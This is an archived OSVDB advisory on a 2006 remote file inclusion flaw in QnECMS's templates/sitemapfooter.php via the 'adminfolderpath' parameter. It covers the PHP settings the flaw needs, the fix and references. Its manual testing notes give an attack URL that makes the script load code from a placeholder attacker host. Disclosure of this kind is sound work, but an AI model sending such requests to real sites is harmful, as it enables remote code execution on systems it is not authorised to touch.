QnECMS templates/sitemapfooter.php adminfolderpath Variable Remote File Inclusion

2006-10-30T11:18:44
ID OSVDB:30124
Type osvdb
Reporter M.Hasran Addahroni(eufrato@gmail.com)
Modified 2006-10-30T11:18:44

Description

Vulnerability Description

QnECMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to templates/sitemapfooter.php not properly sanitizing user input supplied to the 'adminfolderpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the allow_fopenurl PHP option must be set to 'on'.

Solution Description

Upgrade to version 2.6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

QnECMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to templates/sitemapfooter.php not properly sanitizing user input supplied to the 'adminfolderpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[QnECMS_path]/templates/sitemapfooter.php?adminfolderpath=http://[attacker]/evil?

References:

Vendor URL: http://www.qnecms.co.uk/ Secunia Advisory ID:22623 Related OSVDB ID: 30118 Related OSVDB ID: 30119 Related OSVDB ID: 30121 Related OSVDB ID: 30122 Related OSVDB ID: 30125 Related OSVDB ID: 30120 Related OSVDB ID: 30123 Related OSVDB ID: 30117 Other Advisory URL: http://advisories.echo.or.id/adv/adv53-K-159-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0450.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0488.html Keyword: ECHO_ADV_53$2006 ISS X-Force ID: 29871 Generic Exploit URL: http://www.milw0rm.com/exploits/2681 FrSIRT Advisory: ADV-2006-4258 CVE-2006-5627 Bugtraq ID: 20801